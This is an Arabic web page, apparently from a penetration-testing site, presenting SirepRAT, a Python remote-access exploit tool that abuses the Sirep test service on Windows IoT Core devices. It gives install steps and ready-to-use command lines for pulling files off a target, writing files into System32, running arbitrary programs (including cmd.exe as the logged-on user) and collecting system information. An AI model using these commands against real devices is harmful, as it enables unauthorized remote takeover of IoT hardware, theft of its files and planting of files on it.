الرئيسة اختبار الاختراق نظام الاختراق SirepRAT - RCE مبني على Windows IoT Core (RAT)

نظام الاختراق SirepRAT - RCE مبني على Windows IoT Core (RAT)

نظام الاختراق SirepRAT - RCE مبني على Windows IoT Core (RAT)
SirepRAT - RCE نظام مبني على Windows IoT Core يتميز SirepRAT بإمكانيات برامج الاختراق remote access tool الكاملة دون الحاجة إلى كتابة برنامج اختراق حقيقي RAT على الهدف.

تستغل الطريقة خدمة اختبار Sirep المضمنة في الصور الرسمية المعروضة على موقع Microsoft وتعمل عليها. هذه الخدمة هي جزء العميل من إعداد Hardware Lab Kit الذي يمكن للمرء إنشاؤه من أجل إجراء اختبارات برنامج التشغيل / الأجهزة على جهاز إنترنت الأشياء. يستخدم بروتوكول Sirep / WPCon / TShell.

قمنا بتفكيك بروتوكول Sirep / WPCon وأظهرنا كيف يعرض هذا البروتوكول واجهة أوامر بعيدة للهكرز، والتي تتضمن قدرات RAT مثل الحصول على وضع الملفات على مواقع عشوائية والحصول على معلومات النظام.

بناءً على النتائج التي استخلصناها من هذا البحث حول الخدمة والبروتوكول ، أنشأنا أداة بيثون بسيطة تسمح باستغلالها باستخدام الأوامر المختلفة المدعومة. أطلقنا عليها اسم SirepRAT.

  • يدعم جميع أوامر Sirep / TShell
  • GetSystemInformationFromDevice
  • GetFileFromDevice
  • GetFileInformationFromDevice
  • PutFileOnDevice
  • LaunchCommandWithOutput

يتميز بواجهة مستخدم سهلة وبديهية لإرسال أوامر إلى هدف Windows IoT Core. إنه يعمل على أي جهاز متصل بكبل يعمل بنظام Windows IoT Core مع صورة رسمية من Microsoft.

ماهي صورة Windows IoT Core

هي صور نظام التشغيل الأساسية التي تدعم نظام Windows IoT الأساسي. يعد Windows 10 IoT Core هو أصغر إصدار من إصدارات Windows 10 التي تعزز البنية الأساسية الشائعة لنظام التشغيل Windows 10. 

تتيح هذه الإصدارات إنشاء أجهزة منخفضة التكلفة بموارد أقل. يعمل تطوير نظام التشغيل Windows 10 IoT Core على تعزيز النظام الأساسي العالمي لـ Windows. تعرف على المزيد حول Windows 10 IoT Core هنا.

Setting up a Raspberry Pi

الاجهزة المدعومة:

  1. MinnowBoard
  2. Turbot
  3. Raspberry Pi
  4. DragonBoard 410c
  5. AAEON
  6. Up Squared
الاجهزة المدعومة MinnowBoard Turbot Raspberry Pi DragonBoard 410c AAEON Up Squared

كيفية التثبيت Setup SirepRAT 

pip install -r requirements.txt

كيفية الاستعمال والاوامر الخاصة بالرات SirepRAT

تحميل الملف - Download File

python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

رفع ملف - Upload File

python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

تشغيل برنامج - Run Arbitrary Program

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

باستخدام الوسائط ، تم انتحال صفته باعتباره المستخدم المسجل حاليًا:

python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

احصل على معلومات النظام - Get System Information

python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

احصل على معلومات الملف - Get File Information

python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

انظر التعليمات للحصول على التفاصيل الكاملة:

python SirepRAT.py - help

مواضيع ذات صلة :

شارك المقال